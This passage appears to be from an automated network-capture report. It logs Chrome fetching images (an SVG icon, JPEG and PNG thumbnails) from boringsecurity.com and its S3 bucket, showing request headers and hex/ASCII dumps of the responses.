                                                                          Data Ascii: &|wk6clK3ENoFG4c</[<(rab#Ccxy\Gn|=Aq]y.]2&6Ci 3H@'D cX;N7(~Ztr+APa#a5K]HN[w7@e=tyK-]sNH0`DS.=_8[6QykR
                                                                          2023-12-10 16:45:01 UTC538INData Raw: 19 37 2d 0b 43 db 9b ac 5b 4f cd 47 2a 1f 9b 1e 1b 98 b5 1b 83 b0 25 8a 08 d6 0b 11 ed 7b 0d e3 24 bd 3a 23 68 45 a1 31 79 e7 2b 56 aa 6f 36 ab 65 04 56 c6 57 23 d1 d2 f2 26 6f ac 82 d5 a3 51 d5 1b d1 4a bc 23 72 41 ce 97 37 a2 32 1c 6d f3 ea 2e 5f 63 c9 88 9e 97 9b d4 66 73 5b c7 49 9d d2 79 20 50 bc 7a 55 ce 65 b6 4d 99 9e b7 31 41 9b a3 b5 4b ea c9 04 d6 ae 70 f7 20 21 eb de f0 fd 06 bd 86 3c e5 dc 67 85 e9 39 38 6c de 33 a5 7a ce 84 14 51 9d a8 1d 44 f0 b3 44 d1 72 3d 67 9d 73 5b f6 ff 00 3b c1 8e 54 5d 6f 58 6d 29 3a 00 ef a0 37 29 07 a6 67 1c 5e 6f ac 05 bf 2f 3b 75 a4 72 76 f2 ad 2f 56 3b 82 95 68 0d c4 db 55 a0 3b 70 f9 a7 3e ef 35 dc 7c 9c fb f3 ba 04 0c 68 4d 84 b3 59 e6 33 cf e8 c0 ea b6 a6 b8 53 7c ea 9d 3b 46 12 6f 63 27 d5 02 39 f0 d2 32 46
                                                                          Data Ascii: 7-C[OG*%{$:#hE1y+Vo6eVW#&oQJ#rA72m._cfs[Iy PzUeM1AKp !<g98l3zQDDr=gs[;T]oXm):7)g^o/;urv/V;hU;p>5|hMY3S|;Foc'92F
                                                                          2023-12-10 16:45:01 UTC4744INData Raw: 77 13 6c 76 83 a9 9c a0 71 3e 81 aa b7 2d 73 de 6e 87 72 ac 8e fe d2 eb 65 75 78 da 55 c2 eb f2 18 8d e6 f4 25 5d 95 5a a8 33 34 83 51 63 22 ec 4f 44 7b 9a 43 0e 96 fc ed 1b 7a 81 f9 d2 4d fa 0b e1 5a ae ab 1c 73 aa e8 81 6d 83 61 cd cb 38 06 46 03 4e da 33 a0 ae 0f 2e 9b 2d 6a 63 6c d6 72 e2 7c e3 30 93 92 e8 f5 34 a3 61 c3 4d 45 f7 35 5a 26 40 75 b9 4a 8a 1d 23 2b 9b 91 70 52 71 f7 d1 cf ea 37 e6 3b dc fd 06 0e f7 17 14 3c b9 f3 e7 ee 0b 5c b9 ea e8 d7 19 a6 c5 0d 72 4c 6d 83 ec 89 0c 7a 3a 33 95 33 d8 b4 59 bf 86 28 6a 18 68 d4 30 60 c3 28 54 4b 6c 56 7d a1 6b 72 c1 2a 7a 92 4b 2f 53 ae e5 15 5c ad 57 40 f3 73 23 41 2b e7 0f 3a 53 49 ba b5 50 c2 ca e6 65 bc 34 75 ae 93 e8 52 e8 38 97 45 5f 3d c4 dd 09 cf ea 72 0e 71 f5 39 dd 43 6e 71 47 66 12 48 b2 86
                                                                          Data Ascii: wlvq>-snreuxU%]Z34Qc"OD{CzMZsma8FN3.-jclr|04aME5Z&@uJ#+pRq7;<\rLmz:33Y(jh0`(TKlV}kr*zK/S\W@s#A+:SIPe4uR8E_=rq9CnqGfH
                                                                          2023-12-10 16:45:01 UTC5930INData Raw: 47 2e b5 9a 71 b8 ab 69 8e 49 82 76 ab 1a 04 99 84 94 3e 9f 25 a6 fa 9b e3 9a 32 eb eb 9c 68 cf 9a 75 d8 ad f6 fa 3d 2c f9 96 0b d4 a3 96 2e a0 6d f2 34 4d df 56 f9 8f 05 80 ad e2 8c b2 b6 93 72 ab 72 68 7a dc e9 99 25 71 67 05 85 01 c0 8d 74 75 5e f3 4c 67 d3 db 18 0f 14 65 c0 41 01 86 20 f5 8c ee 5e 0d 90 b4 27 95 c5 2d e0 d1 17 7b d4 d4 cd 8c 2c 63 2d 21 14 96 8c e4 99 4f 3a d0 da 2e 32 60 09 a5 27 58 de 02 e0 48 d0 c8 60 81 79 ed 10 01 b2 82 a7 e8 1c be 24 ea e4 ec 3f f3 d6 1c fb 2f 3c 97 0d 3f 4b ca 7b 9b 3a 75 e2 b3 97 ab 8a 74 ab a7 99 ec ae 24 f0 fc 20 4a a8 aa e6 02 2c b7 82 05 d6 b0 9e 28 91 82 c6 1b 73 59 d6 53 53 6d 8a 90 f5 a8 84 9d 26 29 61 8a aa 7b 18 a3 45 06 b2 26 db 9c e2 b1 28 64 c2 6d b8 14 c3 59 4f 0a 67 a6 40 b5 d8 d4 73 f1 43 e8 28
                                                                          Data Ascii: G.qiIv>%2hu=,.m4MVrrhz%qgtu^LgeA ^'-{,c-!O:.2`'XH`y$?/<?K{:ut$ J,(sYSSm&)a{E&(dmYOg@sC(
                                                                          2023-12-10 16:45:01 UTC7116INData Raw: a7 af cf 24 82 92 40 8b 33 97 4b 4d 6a 3b 17 b7 f2 f3 45 a2 47 91 07 21 9c 92 9a b9 28 24 91 ba de 86 bb 28 54 05 d0 5c 68 8f 15 ec 84 18 08 40 9a ee 29 68 6a 06 c6 45 f7 82 19 b0 ec ad ca 84 b7 24 3c a9 24 09 24 09 24 09 24 09 24 09 24 09 24 09 24 09 24 09 24 64 92 04 a9 07 ce e8 c9 87 b1 5a 93 4f 3e 49 2b 9b 32 48 ee 28 a4 9d 35 24 db ce 95 20 5c 91 12 48 12 48 12 a4 09 72 05 dc 89 dd c8 17 72 27 72 40 a9 24 e8 62 c9 c1 67 6e 4c 07 87 24 99 e5 c9 b9 ce 04 9e 9e 3e 90 52 79 3b 27 99 29 f5 c9 26 29 3f 3d 27 a7 18 f5 52 64 cc 49 3c f7 48 49 a3 f3 b7 27 b7 cf 52 40 92 40 92 46 49 20 e4 91 12 a4 09 24 09 24 09 24 65 37 22 ed 02 72 2e 80 31 23 e6 3e 64 79 ef 52 2d f5 52 4f 25 0e 40 cb b2 4b 2f 2e 41 30 39 1c 2f 24 7b ff 00 ff c4 00 31 10 00 02 02 01 03 02 06
                                                                          Data Ascii: $@3KMj;EG!($(T\h@)hjE$<$$$$$$$$$$dZO>I+2H(5$ \HHrr'r@$bgnL$>Ry;')&)?='RdI<HI'R@@FI $$$e7"r.1#>dyR-RO%@K/.A09/${1
                                                                          2023-12-10 16:45:01 UTC8302INData Raw: b6 6d 9a 81 88 bf 1e 87 dd 58 6d d3 77 ae 58 30 96 fa b4 d6 7c ab 11 ce e8 16 62 62 63 af 73 0d 5b 65 bd d3 4c a3 c3 80 04 b1 bd 5e ff 00 c1 5f cb 1d cb 2c ba a1 5f 98 77 82 9b 58 8d 21 83 4b 50 81 40 8f 59 56 ae c1 70 2a 41 0d 9e 9f 08 50 ab 25 8b 64 2b 98 0e 0c da 6b 8a 43 8e 9a 86 64 65 31 4b 11 4e ea a2 b0 75 e8 42 d8 17 3a 73 36 45 68 cb 98 1a 32 6e 8b 67 72 b8 68 6c 59 ce a9 1b 51 b8 1b 1c a9 69 bc 42 e4 ca ee b5 43 db a8 71 d3 bc ef fc 18 98 9b 66 26 21 65 59 c8 90 30 3e 73 58 99 2b 11 de a7 56 dc 2c 19 49 75 79 6a fd bf d1 d3 57 07 c6 58 66 97 48 ae 82 84 01 19 ab 6e 3d d1 9f 28 ae 0a c4 f6 5f 5c d9 36 4d 93 64 2b 80 10 b7 56 50 1a ab 8f 1f 88 c4 b5 c5 93 13 13 1d 31 d6 9a 79 26 e4 e5 de 23 be e0 0f fd 68 01 68 34 f6 98 34 90 d0 2a 64 75 b1 5f b1
                                                                          Data Ascii: mXmwX0|bbcs[eL^_,_wX!KP@YVp*AP%d+kCde1KNuB:s6Eh2ngrhlYQiBCqf&!eY0>sX+V,IuyjWXfHn=(_\6Md+VP1y&#hh44*du_
                                                                          2023-12-10 16:45:01 UTC6058INData Raw: 53 2d fd 19 95 03 6a c4 b2 c3 61 23 1d 0a 86 b7 62 cd ab 36 ac e3 49 c4 b3 8a 71 34 e5 b5 22 ea e2 db 5b cd b2 e3 9b 14 6d 57 f5 1c 74 28 0c 35 98 1d 96 62 03 fc 04 66 6d 23 a2 5f 62 46 bb 98 8a c0 e9 bb 31 f6 a8 dd 63 84 41 9e 39 d9 46 e2 66 c9 c8 33 b5 da 2a 84 1d 37 4e f1 ac 54 9f b1 e2 a2 a7 4f 69 b8 b4 15 f7 6c 20 dc cd 02 00 dd 49 00 72 17 8e 30 cc b6 3b 74 24 2c 2a d6 c4 d2 45 50 be 46 45 70 da 73 0a e0 95 c4 c9 58 2c 84 ee e8 3c 8e fb 45 6b e5 24 28 00 d8 dd 3d e5 8f b1 2b 18 18 2f 05 40 74 27 12 9f 53 da d9 b1 a5 75 03 d4 fa 8d af 81 45 71 d0 38 56 28 7d c6 ee 39 c8 cb 30 cc 45 50 00 25 9f 28 73 cb c7 6c e2 b6 71 5b 38 ad 9b 2d 9e a1 37 af 42 8a 61 aa 0b 2d a8 54 32 d2 a4 c8 29 0a 46 c2 cd f3 2d 04 f9 4f 89 fe 1d bd 12 c7 48 97 a1 9c 8f 68 54 1b
                                                                          Data Ascii: S-ja#b6Iq4"[mWt(5bfm#_bF1cA9Ff3*7NTOil Ir0;t$,*EPFEpsX,<Ek$(=+/@t'SuEq8V(}90EP%(slq[8-7Ba-T2)F-OHhT
                                                                          2023-12-10 16:45:01 UTC10674INData Raw: 99 27 a0 40 f6 1e 44 62 1a f8 95 2a 4d 49 dd 6c 56 57 66 3c 31 75 1d f9 37 1e 37 30 22 2c f7 f2 92 00 6d 4a c7 b9 db a6 df e0 02 2c 15 e3 a6 44 18 55 cf 53 98 18 ee e9 6f df 54 3f 76 e2 2b 0e 32 4e e2 3d a3 36 d0 94 1b 22 d4 89 d2 ca f7 4e 61 3c 56 d8 35 82 0d 45 46 5b a9 da de 25 cc de 27 26 27 88 25 79 c4 f1 16 4e 47 33 75 b3 2e af fc e6 1e 83 a2 15 1d 37 08 d5 83 30 f5 c5 b5 5b a3 5a 5c 21 58 d8 20 5a 6a 81 96 c5 1b d1 53 4f db 8d 04 dd 8e 9c 83 3c 76 34 e2 ad 61 63 32 26 67 79 b7 a6 23 2f a1 7e 0d f6 52 8a 6a cf 6e 9b 84 de 09 b1 f6 58 2e 52 ba 7e 35 a6 ae 53 1b 6f 88 38 96 2a 96 21 84 ed 29 2c 28 f2 bd c8 91 b5 2c 61 3b 8e 0c 00 0f 3e 26 d9 b7 b6 22 9a c4 de b0 93 8d cf 37 3c fd a6 71 b9 9b 42 03 6e 62 26 d9 ef 3d 85 87 37 55 2d 38 67 5a c5 76 01 bb
                                                                          Data Ascii: '@Db*MIlVWf<1u770",mJ,DUSoT?v+2N=6"Na<V5EF[%'&'%yNG3u.70[Z\!X ZjSO<v4ac2&gy#/~RjnX.R~5So8*!),(,a;>&"7<qBnb&=7U-8gZv


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          175192.168.2.54990775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC604OUTGET /images/twitter_dark.svg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC398INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 32 32 61 35 37 65 62 32 38 33 35 32 37 34 37 31 65 30 38 37 65 31 32
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 1150Content-Type: image/svg+xmlDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: "022a57eb283527471e087e12
                                                                          2023-12-10 16:45:01 UTC788INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 34 20 32 2e 36 36 35 36 33 43 32 33 2e 30 39 39 37 20 33 2e 30 35 36 38 31 20 32 32 2e 31 34 37 32 20 33 2e 33 31 34 35 32 20 32 31 2e 31 37 32 35 20 33 2e 34 33 30 36 33 43 32 32 2e 31 39 36 38 20 32 2e 38 33 30 38 32 20 32 32 2e 39 36 37 32 20 31 2e 38 37 37 39 32 20 32 33 2e 33 33 39 20 30 2e 37 35 30 36 33 33 43 32 32 2e 33 37 30 35 20 31 2e 33 31 36 39 33 20 32 31 2e 33 31 32 38 20 31 2e 37 31 34 32 37 20 32 30 2e 32 31 31 20 31 2e 39
                                                                          Data Ascii: <svg width="24" height="20" viewBox="0 0 24 20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M24 2.66563C23.0997 3.05681 22.1472 3.31452 21.1725 3.43063C22.1968 2.83082 22.9672 1.87792 23.339 0.750633C22.3705 1.31693 21.3128 1.71427 20.211 1.9
                                                                          2023-12-10 16:45:01 UTC362INData Raw: 33 32 38 20 31 32 2e 30 39 31 20 32 2e 36 38 38 35 20 31 32 2e 30 33 30 36 43 33 2e 33 31 34 20 31 33 2e 39 35 35 36 20 35 2e 31 33 34 35 20 31 35 2e 33 35 35 36 20 37 2e 32 39 31 20 31 35 2e 33 39 35 36 43 35 2e 35 33 38 36 39 20 31 36 2e 37 34 36 31 20 33 2e 33 38 37 33 31 20 31 37 2e 34 37 36 20 31 2e 31 37 35 20 31 37 2e 34 37 30 36 43 30 2e 37 38 32 33 30 39 20 31 37 2e 34 37 20 30 2e 33 38 39 39 38 33 20 31 37 2e 34 34 36 37 20 30 20 31 37 2e 34 30 30 36 43 32 2e 32 35 30 35 39 20 31 38 2e 38 33 37 37 20 34 2e 38 36 36 37 32 20 31 39 2e 35 39 37 39 20 37 2e 35 33 37 20 31 39 2e 35 39 30 36 43 31 36 2e 36 30 35 20 31 39 2e 35 39 30 36 20 32 31 2e 35 35 39 20 31 32 2e 32 30 35 36 20 32 31 2e 35 35 39 20 35 2e 38 30 30 36 33 43 32 31 2e 35 35 39 20 35
                                                                          Data Ascii: 328 12.091 2.6885 12.0306C3.314 13.9556 5.1345 15.3556 7.291 15.3956C5.53869 16.7461 3.38731 17.476 1.175 17.4706C0.782309 17.47 0.389983 17.4467 0 17.4006C2.25059 18.8377 4.86672 19.5979 7.537 19.5906C16.605 19.5906 21.559 12.2056 21.559 5.80063C21.559 5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          176192.168.2.54991275.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC544OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 33 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 34 63 36 2d 39
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50933Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1222Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: "4c6-9
                                                                          2023-12-10 16:45:01 UTC774INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 00 30 00 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 19 00 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 02 01 03 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 88 6f b7 d6 69 80 ed 46 0e 87 8c 66 92 76 74 29 d9 dd b2 39 00 52 8b e4 a9 67 f2 e7 21
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!2222222222222222222222222222222222222222222222222200"oiFfvt)9Rg!
                                                                          2023-12-10 16:45:01 UTC448INData Raw: ae 1d ea e0 64 23 cb 01 1a cc 5a cc a5 4f 18 43 ec 2e 55 c4 4e 5a f3 16 9b c4 a0 af 77 09 37 74 31 97 af eb 2c ee 0d 09 76 6a 63 ba 2f ec a0 a5 aa 65 a7 a3 f5 2c 0e 87 c5 9f ff da 00 0c 03 01 00 02 00 03 00 00 00 10 32 4b ad d0 1d fb 3f ff c4 00 19 11 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 00 11 21 31 51 ff da 00 08 01 03 01 01 3f 10 69 ac 4e 18 1f 16 07 bd f2 db 61 a7 4b af 08 03 0b ff c4 00 19 11 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 00 11 21 31 c1 ff da 00 08 01 02 01 01 3f 10 5d 90 bc 27 73 d4 a4 87 21 e1 df 3e db 31 b8 7c 83 65 ae df ff c4 00 22 10 01 01 00 02 02 02 01 05 01 00 00 00 00 00 00 00 01 11 00 21 31 61 41 51 71 81 91 b1 c1 f0 a1 ff da 00 08 01 01 00 01 3f 10 52 44 fd ed df f9 8c ca d2 54 0f 0d f8 c8 c2 02 76 97 57
                                                                          Data Ascii: d#ZOC.UNZw7t1,vjc/e,2K?!1Q?iNaK!1?]'s!>1|e"!1aAQq?RDTvW


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          177192.168.2.5499083.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC629OUTGET /thumbnail_baebee_15f9684169.jpg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 6b 36 6c 76 36 64 30 33 74 63 42 54 41 6e 30 45 65 4f 37 48 44 48 61 43 69 4b 49 45 41 2f 38 6b 4d 4c 76 74 49 76 77 67 48 55 72 32 6f 6d 58 46 32 6c 61 78 34 6d 55 63 68 42 4b 32 4f 69 39 53 48 6c 50 44 67 72 68 6d 64 55 57 4a 4a 77 4b 4d 71 38 5a 47 63 55 72 53 42 76 6e 63 65 74 66 2f 33 4a 6f 46 58 30 76 4a 48 34 77 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 32 46 53 36 58 36 50 35 5a 31 4a 39 4b 50 4d 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 30 32 20 4d 61 79 20 32 30 32 33 20 30 38 3a 30 39 3a 32 37 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: k6lv6d03tcBTAn0EeO7HDHaCiKIEA/8kMLvtIvwgHUr2omXF2lax4mUchBK2Oi9SHlPDgrhmdUWJJwKMq8ZGcUrSBvncetf/3JoFX0vJH4w=x-amz-request-id: 82FS6X6P5Z1J9KPMDate: Sun, 10 Dec 2023 16:45:02 GMTLast-Modified: Tue, 02 May 2023 08:09:27 GM
                                                                          2023-12-10 16:45:01 UTC6168INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 02 03 05 06 07 01 08 00 ff c4 00 4a 10 00 01 03 03 03 01 05 04 02 0d 0a 05 05 00 00 00 01 02 03 04 00 05 11 06 12 21 31 07 13 22 41 51 14 32 61 71 23 62 08 15 16 17 35 52 81 91 92 a1 b1 b2 d1 24 34 42 53 54 72 73 a2 c1 c2
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("J!1"AQ2aq#b5R$4BSTrs


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          178192.168.2.5499103.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC655OUTGET /thumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 6f 2f 39 34 68 41 50 69 37 2f 35 45 39 44 65 2b 56 72 59 55 4c 47 4a 75 67 6c 36 6a 70 6f 74 6f 4e 7a 59 31 32 56 43 4c 51 64 50 4e 44 57 62 36 76 7a 51 56 33 55 76 43 58 2b 2f 36 71 69 6f 6d 43 56 54 5a 4e 51 4c 37 66 4a 55 73 78 58 30 53 6d 33 73 68 4a 49 51 45 46 38 52 64 41 36 42 2b 53 32 36 70 77 72 44 4d 48 39 67 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 32 46 52 33 42 36 4b 56 35 47 37 39 42 52 54 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 32 20 53 65 70 20 32 30 32 32 20 32 33 3a 33 30 3a 32 35 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: o/94hAPi7/5E9De+VrYULGJugl6jpotoNzY12VCLQdPNDWb6vzQV3UvCX+/6qiomCVTZNQL7fJUsxX0Sm3shJIQEF8RdA6B+S26pwrDMH9g=x-amz-request-id: 82FR3B6KV5G79BRTDate: Sun, 10 Dec 2023 16:45:02 GMTLast-Modified: Thu, 22 Sep 2022 23:30:25 GM
                                                                          2023-12-10 16:45:01 UTC1548INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 05 5c d4 d9 fa ff c7 04 51 41 40 ba bb 41 14 41 44 42 da a6 14 10 01 29 29 45 ec c2 ee c4 0e 14 54 94 50 24 ec 5a bb bb 5d dd d5 55 01 5b 72 9a 99 39 cf ff f5 1c 66 70 74 f5 ee de ff bd f7 a7 ae ec eb 75 76 86 1a e1 fb 7d cf e7 c9 f3 1c c6 da dc f4 56 77 05 3b 18 1e 07 43 e4 6e 3f c9 1a f7 db f3 6d b7 5f bc d8 c9 ae ac c8 17 54 88 17 3e 6f 5e cd d7 a0 f2 2f ae 81 34 2f e5 2f 76 b2 1e 3f df 76 e7 c6 93 ac f1 4e b9 3e 32 cf 05 79 8c f5 db 46 b7 62 5c 17 ec 60 6c b8 99 a1 f3 eb f3 6d 57 2b 2a 0a e0 65 e5 2e a8 ac 2c 84 8a ca 42 fa 28 79 de bc 9a af 41 c5 5f 5c 03
